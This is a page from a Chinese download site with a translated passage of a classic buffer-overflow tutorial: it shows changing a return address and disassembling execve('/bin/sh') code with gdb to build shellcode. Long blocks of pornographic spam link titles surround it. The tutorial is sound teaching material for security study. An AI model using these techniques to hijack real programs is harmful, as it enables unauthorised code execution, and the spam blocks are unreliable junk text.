亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

??

?? 緩沖溢出原理 經典哦
??
?? 第 1 頁 / 共 4 頁
字號:
   int *ret;

   ret = buffer1 + 12;
   (*ret) += 8;
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
  printf("%d\n",x);
}
------------------------------------------------------------------------------

    我們把buffer1[]的地址加上12, 所得的新地址是返回地址儲存的地方. 我們想跳過
賦值語句而直接執行printf調用. 如何知道應該給返回地址加8個字節呢? 我們先前使用
過一個試驗值(比如1), 編譯該程序, 祭出工具gdb:

------------------------------------------------------------------------------
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 <main>:       pushl  %ebp
0x8000491 <main+1>:     movl   %esp,%ebp
0x8000493 <main+3>:     subl   $0x4,%esp
0x8000496 <main+6>:     movl   $0x0,0xfffffffc(%ebp)
0x800049d <main+13>:    pushl  $0x3
0x800049f <main+15>:    pushl  $0x2
0x80004a1 <main+17>:    pushl  $0x1
0x80004a3 <main+19>:    call   0x8000470 <function>
0x80004a8 <main+24>:    addl   $0xc,%esp
0x80004ab <main+27>:    movl   $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>:    movl   0xfffffffc(%ebp),%eax
0x80004b5 <main+37>:    pushl  %eax
0x80004b6 <main+38>:    pushl  $0x80004f8
0x80004bb <main+43>:    call   0x8000378 <printf>
0x80004c0 <main+48>:    addl   $0x8,%esp
0x80004c3 <main+51>:    movl   %ebp,%esp
0x80004c5 <main+53>:    popl   %ebp
0x80004c6 <main+54>:    ret
0x80004c7 <main+55>:    nop
------------------------------------------------------------------------------

    我們看到當調用function()時, RET會是0x8004a8, 我們希望跳過在0x80004ab的賦值
指令. 下一個想要執行的指令在0x8004b2. 簡單的計算告訴我們兩個指令的距離為8字節.


                                  Shell Code
                                  ~~~~~~~~~~
    現在我們可以修改返回地址即可以改變程序執行的流程, 我們想要執行什么程序呢?
在大多數情況下我們只是希望程序派生出一個shell. 從這個shell中, 可以執行任何我
們所希望的命令. 但是如果我們試圖破解的程序里并沒有這樣的代碼可怎么辦呢? 我們
怎么樣才能將任意指令放到程序的地址空間中去呢? 答案就是把想要執行的代碼放到我
們想使其溢出的緩沖區里, 并且覆蓋函數的返回地址, 使其指向這個緩沖區. 假定堆棧
的起始地址為0xFF, S代表我們想要執行的代碼, 堆棧看起來應該是這樣:

內存低     DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     內存高
地址       89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     地址
           buffer                sfp   ret   a     b     c

<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
           ^                            |
           |____________________________|
堆棧頂部                                                          堆棧底部
                                                                
    派生出一個shell的C語言代碼是這樣的:
  
shellcode.c
-----------------------------------------------------------------------------
#include <stdio.h>

void main() {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}
------------------------------------------------------------------------------
 
    為了查明這程序變成匯編后是個什么樣子, 我們編譯它, 然后祭出調試工具gdb. 記住
在編譯的時候要使用-static標志, 否則系統調用execve的真實代碼就不會包括在匯編中,
取而代之的是對動態C語言庫的一個引用, 真正的代碼要到程序加載的時候才會聯入.

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp
0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>:    pushl  $0x0
0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
0x8000149 <main+25>:    pushl  %eax
0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
0x800014d <main+29>:    pushl  %eax
0x800014e <main+30>:    call   0x80002bc <__execve>
0x8000153 <main+35>:    addl   $0xc,%esp
0x8000156 <main+38>:    movl   %ebp,%esp
0x8000158 <main+40>:    popl   %ebp
0x8000159 <main+41>:    ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:   pushl  %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx
0x80002c0 <__execve+4>: movl   $0xb,%eax
0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx
0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx
0x80002ce <__execve+18>:        int    $0x80
0x80002d0 <__execve+20>:        movl   %eax,%edx
0x80002d2 <__execve+22>:        testl  %edx,%edx
0x80002d4 <__execve+24>:        jnl    0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:        negl   %edx
0x80002d8 <__execve+28>:        pushl  %edx
0x80002d9 <__execve+29>:        call   0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:        popl   %edx
0x80002df <__execve+35>:        movl   %edx,(%eax)
0x80002e1 <__execve+37>:        movl   $0xffffffff,%eax
0x80002e6 <__execve+42>:        popl   %ebx
0x80002e7 <__execve+43>:        movl   %ebp,%esp
0x80002e9 <__execve+45>:        popl   %ebp
0x80002ea <__execve+46>:        ret
0x80002eb <__execve+47>:        nop
End of assembler dump.
------------------------------------------------------------------------------

    下面我們看看這里究竟發生了什么事情. 先從main開始研究:
    
------------------------------------------------------------------------------
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp

        這是例程的準備工作. 首先保存老的幀指針, 用當前的堆棧指針作為新的幀指針,
        然后為局部變量保留空間. 這里是:
        
        char *name[2];
        
        即2個指向字符串的指針. 指針的長度是一個字, 所以這里保留2個字(8個字節)的
        空間.
        
0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)

        我們把0x80027b8(字串"/bin/sh"的地址)這個值復制到name[]中的第一個指針, 這
        等價于:  
        
        name[0] = "/bin/sh";
        
0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)                            
                                                        
       
        我們把值0x0(NULL)復制到name[]中的第二個指針, 這等價于:
        
        name[1] = NULL;
        
        對execve()的真正調用從下面開始:
        
0x8000144 <main+20>:    pushl  $0x0

        我們把execve()的參數以從后向前的順序壓入堆棧中, 這里從NULL開始.
        
0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax

        把name[]的地址放到EAX寄存器中.
        
0x8000149 <main+25>:    pushl  %eax

        接著就把name[]的地址壓入堆棧中.
        
0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
        
        把字串"/bin/sh"的地址放到EAX寄存器中
        
0x800014d <main+29>:    pushl  %eax

        接著就把字串"/bin/sh"的地址壓入堆棧中
        
0x800014e <main+30>:    call   0x80002bc <__execve>

        調用庫例程execve(). 這個調用指令把IP(指令指針)壓入堆棧中.
------------------------------------------------------------------------------

    現在到了execve(). 要注意我們使用的是基于Intel的Linux系統. 系統調用的細節隨
操作系統和CPU的不同而不同. 有的把參數壓入堆棧中, 有的保存在寄存器里. 有的使用
軟中斷跳入內核模式, 有的使用遠調用(far call). Linux把傳給系統調用的參數保存在
寄存器里, 并且使用軟中斷跳入內核模式.           

------------------------------------------------------------------------------
0x80002bc <__execve>:   pushl  %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx

        例程的準備工作.
        
0x80002c0 <__execve+4>: movl   $0xb,%eax

        把0xb(十進制的11)放入寄存器EAX中(原文誤為堆棧). 0xb是系統調用表的索引
        11就是execve.

0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx

        把"/bin/sh"的地址放到寄存器EBX中.

0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx

        把name[]的地址放到寄存器ECX中.
        
0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx

        把空指針的地址放到寄存器EDX中.

0x80002ce <__execve+18>:        int    $0x80

        進入內核模式.
------------------------------------------------------------------------------  
                                 

    由此可見調用execve()也沒有什么太多的工作要做, 所有要做的事情總結如下:
    
        a) 把以NULL結尾的字串"/bin/sh"放到內存某處.
        b) 把字串"/bin/sh"的地址放到內存某處, 后面跟一個空的長字(null long word)
.
        c) 把0xb放到寄存器EAX中.
        d) 把字串"/bin/sh"的地址放到寄存器EBX中.
        e) 把字串"/bin/sh"地址的地址放到寄存器ECX中.
        (注: 原文d和e步驟把EBX和ECX弄反了)
        f) 把空長字的地址放到寄存器EDX中.
        g) 執行指令int $0x80. 
        
    但是如果execve()調用由于某種原因失敗了怎么辦? 程序會繼續從堆棧中讀取指令, 
這時的堆棧中可能含有隨機的數據! 程序執行這樣的指令十有八九會core dump. 如果execv
e
調用失敗我們還是希望程序能夠干凈地退出. 為此必須在調用execve之后加入一個exit
系統調用. exit系統調用在匯編語言看起來象什么呢?

exit.c
------------------------------------------------------------------------------
#include <stdlib.h>

void main() {
        exit(0);
}
------------------------------------------------------------------------------
 

------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:      pushl  %ebp
0x800034d <_exit+1>:    movl   %esp,%ebp

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美精品777| 91麻豆国产在线观看| 亚洲精品免费在线播放| 欧美va亚洲va香蕉在线| 欧美精品免费视频| 欧美三级在线看| 色8久久人人97超碰香蕉987| 成人高清免费观看| 成人免费毛片a| 国产xxx精品视频大全| 懂色av一区二区三区免费观看 | 欧美日韩亚洲综合在线 | 不卡一区在线观看| 成人综合婷婷国产精品久久蜜臀| 狠狠色综合播放一区二区| 日本强好片久久久久久aaa| 图片区小说区区亚洲影院| 亚洲电影第三页| 日韩激情在线观看| 久久国产精品99精品国产| 精品写真视频在线观看| 国产永久精品大片wwwapp| 国产在线播精品第三| 国产成人免费视频| 成人免费毛片高清视频| 色悠悠久久综合| 欧美日韩欧美一区二区| 日韩免费电影网站| 久久久久久麻豆| 中文字幕中文在线不卡住| 亚洲男人的天堂在线aⅴ视频| 亚洲精品欧美在线| 免费观看日韩av| 粉嫩高潮美女一区二区三区| 色哟哟精品一区| 91精品午夜视频| 久久久久国产精品麻豆| 中文字幕中文在线不卡住| 一区二区三区波多野结衣在线观看| 日日夜夜精品视频免费| 国产精品一区在线观看乱码| 91美女视频网站| 欧美一区二区三区日韩视频| 久久久久久久久免费| 亚洲精品一卡二卡| 久久99精品久久久| 色老汉av一区二区三区| 精品欧美黑人一区二区三区| 自拍偷拍亚洲欧美日韩| 奇米影视一区二区三区小说| 国产精品小仙女| 欧美视频一区二区在线观看| 久久久精品免费网站| 午夜在线电影亚洲一区| 岛国av在线一区| 欧美一级生活片| 亚洲免费毛片网站| 国产麻豆精品久久一二三| 欧美在线高清视频| 中文字幕中文字幕一区二区| 久久精品国产精品亚洲综合| 日本韩国精品在线| 国产精品色呦呦| 老司机午夜精品| 欧美日韩综合在线| 成人免费一区二区三区视频 | 亚洲黄色小说网站| 高清不卡在线观看av| 日韩精品一区二区在线| 亚洲一区二区精品视频| www.99精品| 国产片一区二区| 国产美女一区二区三区| 日韩三级伦理片妻子的秘密按摩| 亚洲综合精品自拍| 91女厕偷拍女厕偷拍高清| 国产调教视频一区| 精品综合免费视频观看| 制服丝袜av成人在线看| 亚洲一区二区三区四区在线| 色综合久久综合网欧美综合网| 久久久久9999亚洲精品| 国模少妇一区二区三区| 日韩午夜激情电影| 美腿丝袜亚洲色图| 777色狠狠一区二区三区| 亚洲成人先锋电影| 欧美日韩免费在线视频| 亚洲国产精品人人做人人爽| 一本大道久久a久久综合婷婷| 亚洲天堂a在线| 91啪在线观看| 亚洲成人一区在线| 91精品国产免费久久综合| 偷偷要91色婷婷| 欧美一级午夜免费电影| 精品在线亚洲视频| 久久久久国产精品麻豆ai换脸 | 久久精品在线观看| 国产乱理伦片在线观看夜一区| 日韩精品专区在线| 国产老妇另类xxxxx| 欧美国产精品专区| 91亚洲精品乱码久久久久久蜜桃| 亚洲精选视频在线| 欧美美女激情18p| 日韩高清一区二区| 精品国产a毛片| 成人看片黄a免费看在线| 亚洲色图一区二区| 欧美日韩免费在线视频| 九一久久久久久| 欧美国产禁国产网站cc| 色一情一乱一乱一91av| 天天影视涩香欲综合网| 26uuu欧美日本| 91视频免费观看| 青青草国产成人99久久| 国产欧美va欧美不卡在线| 色综合久久久久| 免费在线观看不卡| 中文字幕一区视频| 欧美日本免费一区二区三区| 国产乱人伦偷精品视频免下载| 中文字幕av一区二区三区免费看 | 亚洲精品视频免费看| 欧美日韩国产系列| 国产乱码精品1区2区3区| 一区二区不卡在线播放 | 亚洲一区二区三区美女| 欧美精品一区二区三区蜜桃视频 | 久久亚洲精品小早川怜子| 99久久99久久精品国产片果冻| 午夜私人影院久久久久| 欧美精品一区二区蜜臀亚洲| 99九九99九九九视频精品| 琪琪一区二区三区| 亚洲视频在线观看三级| 精品国产免费人成在线观看| 91黄色免费看| 国产精品一区二区久久精品爱涩| 一区二区在线免费| 国产欧美综合在线| 日韩欧美高清在线| 欧美日韩一区小说| av成人免费在线| 久久精品国产一区二区| 亚洲精品国产精华液| 国产欧美日韩另类视频免费观看| 欧美日韩精品欧美日韩精品| 99久久国产综合精品麻豆| 国产在线看一区| 奇米色777欧美一区二区| 一区二区三区欧美日韩| 中文字幕亚洲成人| 中文字幕欧美激情| 国产亚洲自拍一区| 日韩美女视频一区二区在线观看| 欧美日韩亚洲另类| 欧洲精品视频在线观看| 日本aⅴ免费视频一区二区三区| 日韩免费高清av| 在线免费视频一区二区| 福利一区二区在线| 国产真实乱偷精品视频免| 亚洲国产精品自拍| 一区二区三区av电影| 亚洲乱码一区二区三区在线观看| 中文字幕国产精品一区二区| 久久美女高清视频| 精品国产免费人成在线观看| 日韩免费一区二区| 欧美精品一区二区三区在线播放| 日韩一区二区三区免费观看| 91精品国产欧美日韩| 日韩视频在线你懂得| 日韩一区二区三区视频| 日韩午夜在线影院| 精品福利一二区| 久久91精品久久久久久秒播 | 亚洲美腿欧美偷拍| √…a在线天堂一区| 成人欧美一区二区三区| 一区二区三区蜜桃| 天天射综合影视| 老司机精品视频在线| 久久国产人妖系列| 国产一区二区三区电影在线观看 | 丝袜脚交一区二区| 性感美女久久精品| 久久精品av麻豆的观看方式| 韩国精品免费视频| av不卡免费在线观看| 91在线观看地址| 欧美久久久久久久久| 久久久久久影视| 夜夜揉揉日日人人青青一国产精品| 亚洲在线观看免费| 久久99精品一区二区三区| 成人一级黄色片|